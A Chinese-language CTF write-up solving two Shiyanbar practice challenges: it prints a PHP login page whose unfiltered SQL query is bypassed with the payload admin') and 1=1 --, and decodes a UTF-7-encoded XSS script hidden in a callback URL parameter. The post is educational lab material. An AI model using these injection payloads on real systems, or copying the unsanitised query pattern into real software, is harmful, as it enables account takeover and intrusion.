此贴为实验吧CTF题的解题贴。希望有更多的CTF基友一起交流。

1.程序员的问题

分值:10 难度:易
解题链接: http://ctf5.shiyanbar.com/web/4/index.php
打开之后右击查看源码,会看到一个index.txt。

index.txt

<html>
<head>
welcome to simplexue
</head>
<body>
<?php


if($_POST[user] && $_POST[pass]) {
    $conn = mysql_connect("*******", "****", "****");
    mysql_select_db("****") or die("Could not select database");
    if ($conn->connect_error) {
        die("Connection failed: " . mysql_error($conn));
} 
$user = $_POST[user];
$pass = md5($_POST[pass]);
//admin') and 1=1 --
$sql = "select user from php where (user='$user') and (pw='$pass')";
$query = mysql_query($sql);
if (!$query) {
    printf("Error: %s\n", mysql_error($conn));
    exit();
}
$row = mysql_fetch_array($query, MYSQL_ASSOC);
//echo $row["pw"];
  if($row['user']=="admin") {
    echo "<p>Logged in! Key: *********** </p>";
  }

  if($row['user'] != "admin") {
    echo("<p>You are not admin!</p>");
  }
}

?>
<form method=post action=index.php>
<input type=text name=user value="Username">
<input type=password name=pass value="Password">
<input type=submit>
</form>
</body>
<a href="index.txt">
</html>

可以看到这是一题考php代码审计,源码很简单,$_POST[user]没有任何过滤就带进了查询。可以看到if语句的条件,要$row['user'] == admin才会出flag,很简单,直接用户框写入admin') and 1=1 -- 就能得到flag

2.你能跨过去吗

分值:30 难度:难
解题链接: http://ctf5.shiyanbar.com/basic/xss/
打开链接后会有tips

http://www.test.com/NodeMore.jsp?id=672613&page=2&pageCounter=32&undefined&callback=%2b/v%2b%20%2bADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAiAGsAZQB5ADoALwAlAG4AcwBmAG8AYwB1AHMAWABTAFMAdABlAHMAdAAlAC8AIgApADwALwBzAGMAcgBpAHAAdAA%2bAC0-&_=1302746925413 

可以看到 callback 参数的值

+/v+ +ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAiAGsAZQB5ADoALwAlAG4AcwBmAG8AYwB1AHMAWABTAFMAdABlAHMAdAAlAC8AIgApADwALwBzAGMAcgBpAHAAdAA+AC0-

既然提示是XSS,所以应该和编码有关。 +Axxxxxxxxx- 是UTF-7编码的特殊格式。所以只取

+ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAiAGsAZQB5ADoALwAlAG4AcwBmAG8AYwB1AHMAWABTAFMAdABlAHMAdAAlAC8AIgApADwALwBzAGMAcgBpAHAAdAA+AC0-

解码后就能得到Key
safafwqttqtt.png
然后在输入框输入key值回车,得到flag。